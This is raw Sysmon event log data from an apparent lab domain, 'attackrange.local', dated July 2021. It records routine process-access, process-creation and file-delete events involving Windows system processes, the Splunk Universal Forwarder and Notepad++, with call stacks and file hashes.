07:48:27.676{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.660{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F3CB-60EB-5C79-00000000D001}2764C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.660{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3CB-60EB-5C79-00000000D001}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.661{0C1E0330-F3CB-60EB-5C79-00000000D001}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000806886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:27.145{0C1E0330-F3CA-60EB-5B79-00000000D001}19401772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.738{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F530D11E441C4D8C8CFE423560061CD,SHA256=02EC65BAC550825FFE24A8A6B2F5CB311F5413E743CF1D48E646256528DFB471,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001047380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 23542300x80000000000000001047379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A04F2F29982E94B5EE676ECFC87DD7D,SHA256=C26FF63B67F753CCEF62639F73FD50B7142895CB1B369DA6639BB5D34B51CDC4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001047377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001047376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001047375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+1746d2|C:\Windows\System32\windows.storage.dll+174ba6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814 10341000x80000000000000001047374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1747e9|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001047373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+174765|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001047372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f 10341000x80000000000000001047371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e 10341000x8000000000000000806916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.504{0C1E0330-F3CC-60EB-5D79-00000000D001}25603380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3CC-60EB-5D79-00000000D001}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 